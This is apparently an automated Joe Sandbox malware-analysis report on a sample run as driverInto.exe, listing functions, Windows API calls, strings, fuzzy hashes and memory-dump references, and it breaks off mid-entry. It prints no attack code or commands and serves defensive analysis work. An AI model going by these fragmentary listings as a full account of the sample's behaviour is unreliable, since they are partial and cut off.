Instruction Fuzzy Hash: E0110832900115B7EB629A689D49FFF7BBCFF59700F004050FAC5F60C8C7A9A91987A1

Uniqueness

Uniqueness Score: -1.00%

Function 0101DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

RENAMEDLG, xrefs: 0101DD31
REPLACEFILEDLG, xrefs: 0101DD1C, 0101DD50

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 403203eb5b5d5608aec34c41f773c0d57d40c16a6a7daddeda83fe341a8446e6
Instruction ID: a9b5f280b4583966a2c437509cd04fa4607b2dc3464208648edfb99c05be1b8c
Opcode Fuzzy Hash: 403203eb5b5d5608aec34c41f773c0d57d40c16a6a7daddeda83fe341a8446e6
Instruction Fuzzy Hash: 6301F5B9604244AFD730AED8FD8899A7FA8F748340B00482AF5C5C3228C73ED850DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01029A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 01029AA9
__alldvrm.LIBCMT ref: 01029CAA
__alldvrm.LIBCMT ref: 01029CCC

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction ID: cf92f794dcef4a994ff41bcbf41fdddc51641b6d8b2ae45c24af45c74368076a
Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
Instruction Fuzzy Hash: 5BA129729043BA9FEB26CF18C8917AEBFE5EF55318F2841ADD9C59B281C2398941C750

Uniqueness

Uniqueness Score: -1.00%

Function 0100A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,01007F69,?,?,?), ref: 0100A3FA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,01007F69,?), ref: 0100A43E
SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,01007F69,?,?,?,?,?,?,?), ref: 0100A4BF
CloseHandle.KERNEL32(?,?,?,00000800,?,01007F69,?,?,?,?,?,?,?,?,?,?), ref: 0100A4C6

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 4f6ac1af2a0118dd9921621cc8f9bb45d9dba1c197abcf4cc11a6392a6b8f2cc
Instruction ID: 020702c7db62fd5d77cef9a6f518e718593e5a6ad10676109ccb3f7a767d3cb5
Opcode Fuzzy Hash: 4f6ac1af2a0118dd9921621cc8f9bb45d9dba1c197abcf4cc11a6392a6b8f2cc
Instruction Fuzzy Hash: E841AF312483819AF732DE28DC55FEFBBE8AB85700F04495DB6D1D71C0DAB89A48DB52

Uniqueness

Uniqueness Score: -1.00%

Function 01001100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0100112B
_wcslen.LIBCMT ref: 01001153
_wcslen.LIBCMT ref: 01001182
_wcslen.LIBCMT ref: 010011A9

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 351fc78cd28fb1c62e35d16e53a854b0bc4750968a50890261225db3149ca7f4
Instruction ID: eec721f06f1dd6a54d9e524834f1e9bb5871a12db14cbfb8629f86163a5f8cbc
Opcode Fuzzy Hash: 351fc78cd28fb1c62e35d16e53a854b0bc4750968a50890261225db3149ca7f4
Instruction Fuzzy Hash: 5D41B7719006669BDB219F688C559DE7BB8EF14310F000059F9C9F7289DB34ED598BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0102C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,010247C6,00000000,00000000,010257FB,?,010257FB,?,00000001,010247C6,2DE85006,00000001,010257FB,010257FB), ref: 0102C9D5
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0102CA5E
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0102CA70
__freea.LIBCMT ref: 0102CA79

Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,01024286,?,0000015D,?,?,?,?,01025762,000000FF,00000000,?,?), ref: 01028E38

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 3ffe04c9b6a2cdebf56e317be04d40b801ba53d134c086affbdb35fe2fe3ac73
Instruction ID: ed2d6f2d6174f20c8c28b3809acced4443dd2bf137096f88a7eb9ee66b5ae090
Opcode Fuzzy Hash: 3ffe04c9b6a2cdebf56e317be04d40b801ba53d134c086affbdb35fe2fe3ac73
Instruction Fuzzy Hash: 5131C172A0022AABEF25CF68DC85DFE7BA5EF41714B0442A8EC84E7250E735DD54CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0101A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0101A666
GetDeviceCaps.GDI32(00000000,00000058), ref: 0101A675
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0101A683
ReleaseDC.USER32(00000000,00000000), ref: 0101A691

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 45aa8b72bd48f80fb49a7a90c306cf52de2bd15b1b30a36fb3ee21c4f5a42c14
Instruction ID: 579ba39f9111fb4198bb62cc15749197ef82f3556b60e6f15499c4ba8277be48
Opcode Fuzzy Hash: 45aa8b72bd48f80fb49a7a90c306cf52de2bd15b1b30a36fb3ee21c4f5a42c14
Instruction Fuzzy Hash: A7E08C31A42720FBE2701BA0A91DB8B3E94BB05B52F004505FF899A188DB7E80088BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0101A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON

Download Yara Rule

APIs

Part of subcall function 0101A699: GetDC.USER32(00000000), ref: 0101A69D
Part of subcall function 0101A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0101A6A8
Part of subcall function 0101A699: ReleaseDC.USER32(00000000,00000000), ref: 0101A6B3

GetObjectW.GDI32(?,00000018,?), ref: 0101A83C

Part of subcall function 0101AAC9: GetDC.USER32(00000000), ref: 0101AAD2
Part of subcall function 0101AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0101AB01
Part of subcall function 0101AAC9: ReleaseDC.USER32(00000000,?), ref: 0101AB99

Strings

(, xrefs: 0101A9AA

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 1f69a9f1103e0cd4ab5dd2d00f1819c5b0c22e4572efacf221fc78cb962b5a18
Instruction ID: dc3842d6006a8fa5fabe1f3ddbb26c5507f551926b0bdd9edbcccf53d03fea8b
Opcode Fuzzy Hash: 1f69a9f1103e0cd4ab5dd2d00f1819c5b0c22e4572efacf221fc78cb962b5a18
Instruction Fuzzy Hash: A191F371604380EFD720DF25C884A2BBBE8FFC9611F00495EF99AD7225DB35A845CB62

Uniqueness

Uniqueness Score: -1.00%

Function 010075DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 010075E3

Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0

Part of subcall function 0100A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0100A598

SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0100777F

Part of subcall function 0100A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A501
Part of subcall function 0100A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0100A325,?,?,?,0100A175,?,00000001,00000000,?,?), ref: 0100A532

Strings

:, xrefs: 01007654

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: File$Attributes$CloseFindH_prologTime_wcslen
String ID: :
API String ID: 3226429890-336475711
Opcode ID: 4fea321dbf4fb7375c9c09ef5a9cec7d3b33f215167b03e3376380eb442f8ee7
Instruction ID: b11a4c151c29fc10881f168db68412f4009bbab564832e87430acea193625797
Opcode Fuzzy Hash: 4fea321dbf4fb7375c9c09ef5a9cec7d3b33f215167b03e3376380eb442f8ee7
Instruction Fuzzy Hash: 74417171900259A9FB36EB64CC58EEEB77CAF55300F0040D6A6CAA70D2DB785B85CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0101B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0101B4E3
_wcslen.LIBCMT ref: 0101B4FE

Strings

}, xrefs: 0101B4D6

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _wcslen
String ID: }
API String ID: 176396367-4239843852
Opcode ID: 936d77c377cc58b1bea087efe988a2fe98ba6f7a71d594fa6bd6df2701d6a35c
Instruction ID: 528b68e383d7d2e985ceb3394e070aaf384fcab9c4249081fc2a5a519314684d
Opcode Fuzzy Hash: 936d77c377cc58b1bea087efe988a2fe98ba6f7a71d594fa6bd6df2701d6a35c
Instruction Fuzzy Hash: 3221C67290431A5ADB32DB68D844FABB3FCEF95750F04046AE6C0C7145EB6DD94883A2

Uniqueness

Uniqueness Score: -1.00%

Function 0100F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0100F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0100F2E4
Part of subcall function 0100F2C5: GetProcAddress.KERNEL32(010481C8,CryptUnprotectMemory), ref: 0100F2F4

GetCurrentProcessId.KERNEL32(?,?,?,0100F33E), ref: 0100F3D2

Strings

CryptProtectMemory failed, xrefs: 0100F389
CryptUnprotectMemory failed, xrefs: 0100F3CA

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: AddressProc$CurrentProcess
String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
API String ID: 2190909847-396321323
Opcode ID: 29d45b4ae5b17849e695e41a816c0574041e81956d815b16c1a76b9b31186bd6
Instruction ID: 88968022f55c8b13e60e87dd97a202f24e5968efcf44f9cbcf7f2f7151350bc2
Opcode Fuzzy Hash: 29d45b4ae5b17849e695e41a816c0574041e81956d815b16c1a76b9b31186bd6
Instruction Fuzzy Hash: C5110631A0062B6BFB33AB24D881A6E3B98FF00670F04C157FCC15F2D5DA75A9419791

Uniqueness

Uniqueness Score: -1.00%

Function 0100B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0100B9B8

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

Strings

%c:\, xrefs: 0100B9AE

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 1543624204-3142399695
Opcode ID: bb41615fee49293e50964958264ceec3ea76b34e4573b695035c144c9e2c3a2c
Instruction ID: db617449798f4af6a5e0494c7b9b00353db38c05a3b0950266c7a506ce3bb9a3
Opcode Fuzzy Hash: bb41615fee49293e50964958264ceec3ea76b34e4573b695035c144c9e2c3a2c
Instruction Fuzzy Hash: 9201F56750032379FA72AB7D8C84DABB7ECEE96670F40491BF5C4D60C1EA34D48482B1

Uniqueness

Uniqueness Score: -1.00%

Function 01001316 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0100E2E8: _swprintf.LIBCMT ref: 0100E30E
Part of subcall function 0100E2E8: _strlen.LIBCMT ref: 0100E32F
Part of subcall function 0100E2E8: SetDlgItemTextW.USER32(?,0103E274,?), ref: 0100E38F
Part of subcall function 0100E2E8: GetWindowRect.USER32(?,?), ref: 0100E3C9
Part of subcall function 0100E2E8: GetClientRect.USER32(?,?), ref: 0100E3D5

GetDlgItem.USER32(00000000,00003021), ref: 0100135A
SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

Strings

0, xrefs: 01001319

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0
API String ID: 2622349952-4108050209
Opcode ID: f6b751423ced894b052c88f3860024e1f709eb490e2cb8d31f6b4898ef387fa9
Instruction ID: 65b811ef1a5752bd3bbe4d2a0fe35db3247a4442338e297b6d4ecb649b1af4a4
Opcode Fuzzy Hash: f6b751423ced894b052c88f3860024e1f709eb490e2cb8d31f6b4898ef387fa9
Instruction Fuzzy Hash: 75F03C7010438CABFF671F64C80DAEA3FA9AB44355F048554FDC8595E1CB79C5909B50

Uniqueness

Uniqueness Score: -1.00%

Function 01010FE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,01011101,?,?,0101117F,?,?,?,?,?,01011169), ref: 01010FEA
GetLastError.KERNEL32(?,?,0101117F,?,?,?,?,?,01011169), ref: 01010FF6

Part of subcall function 01006C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01006C54

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 01010FFF

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: ErrorLastObjectSingleWait__vswprintf_c_l
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1091760877-2248577382
Opcode ID: b028f918afee26bbcf9b31b8cff2819d266e557e4b9aefc0b3cbb4930da5d95a
Instruction ID: 51e0d02caec95f89a0b6c173f2cde64c3ea88b909fc38d0b2ed7971a485457a1
Opcode Fuzzy Hash: b028f918afee26bbcf9b31b8cff2819d266e557e4b9aefc0b3cbb4930da5d95a
Instruction Fuzzy Hash: ECD02B71A0453537D52232349C44DBE7809DB21331F104B04F1B8592D9CA6A49514791

Uniqueness

Uniqueness Score: -1.00%

Function 0100E29E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,0100DA55,?), ref: 0100E2A3
FindResourceW.KERNEL32(00000000,RTL,00000005,?,0100DA55,?), ref: 0100E2B1

Strings

RTL, xrefs: 0100E2AB

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 371d609f941b6b2d0f755d35130536fca736c8c4e843f2711f909dc00b00acdb
Instruction ID: 2d604e4db904fe36c96a5bc6f3f98bf81548d637e8a196ca89d90fe7ac456572
Opcode Fuzzy Hash: 371d609f941b6b2d0f755d35130536fca736c8c4e843f2711f909dc00b00acdb
Instruction Fuzzy Hash: 3FC0123164071066F63016656D9DB43AE5C6B00B11F05044CB2C1ED1C5D6AAC48187A0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: driverInto.exePID: 5936, Parent PID: 5844COMMON

Execution Graph

Execution Coverage:	9.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9BAC0D78 Relevance: .3, Instructions: 257COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5acb6b950353cd367346fc2c2fd1d438708124bba7e15d3a9f9d03a4813b607
Instruction ID: 1c99916cc8033251f4fcd1dd072113fbe1952cf0c26cb3547c66555b5453f7e6
Opcode Fuzzy Hash: f5acb6b950353cd367346fc2c2fd1d438708124bba7e15d3a9f9d03a4813b607
Instruction Fuzzy Hash: 4791E671A19A8D4FE799DB6888697A97FE1FF69314F5002BED049C72D6CFB81401C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BAC0B3F Relevance: 3.8, Strings: 3, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

c9, xrefs: 00007FFD9BAC0B56
"s9, xrefs: 00007FFD9BAC0B46
!k9, xrefs: 00007FFD9BAC0B4E

Memory Dump Source

Source File: 00000004.00000002.2023191994.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9bac0000_driverInto.jbxd

Similarity

API ID:
String ID: c9$!k9$"s9
API String ID: 0-3426396564
Opcode ID: 3cf0e537871b3fe32cb1794d6faf08d337dc011eaf409493540f1b81e83b3c6b
Instruction ID: b648ef8da8ab2efb20571b99446ed865df9c69ca35fc992920c907ca1f361fef
Opcode Fuzzy Hash: 3cf0e537871b3fe32cb1794d6faf08d337dc011eaf409493540f1b81e83b3c6b
Instruction Fuzzy Hash: CB01493771A95E8BD741AB3DF8904F8BB40EB9623678603F7D044C7192E541144AC3D0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9BEBE231 Relevance: 1.8, APIs: 1, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

QueryFullProcessImageNameA.KERNEL32 ref: 00007FFD9BEBE3E1

Memory Dump Source

Source File: 00000004.00000002.2030446656.00007FFD9BEB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9beb0000_driverInto.jbxd

Similarity

API ID: FullImageNameProcessQuery
String ID:
API String ID: 3578328331-0
Opcode ID: 9ef0d11af899a83344bbb62f714ad150e5f3bf4afdc557489d1258b0ac2e5c3c
Instruction ID: cd6af228aec382d06a80105b29016b76cafe44e176f434cf30309cd6b0732768
